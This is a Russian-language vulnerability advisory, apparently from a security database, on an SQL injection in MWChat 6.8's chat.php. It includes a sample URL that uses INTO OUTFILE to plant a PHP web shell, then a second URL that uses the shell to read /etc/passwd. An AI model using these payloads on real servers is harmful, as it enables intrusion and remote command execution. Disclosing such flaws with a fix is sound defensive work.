SQL-инъекция в MWChat

Дата публикации:
25.10.2005
Всего просмотров:
3141
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MWChat 6.x
Уязвимые версии: MWChat 6.8 и более ранние версии

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость обнаружена при обработке входных данных в переменной Username сценария chat.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[target]/mwchat/chat.php?Username='UNION%20
SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0
%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20
FROM%20chat_text/*&Sequence_Check=&Lang=en&
Resolution=1280&Room=prova

И, затем:

http://[target]/mwchat/shell.php?cmd=cat%20/etc/passwd

URL производителя: www.appindex.net

Решение: Установите последнюю версию (6.9) с сайта производителя.

Источник:

Ссылки: MWCHAT 6.8 SQL INJECTION / REMOTE COMMANDS EXECUTION

или введите имя

CAPTCHA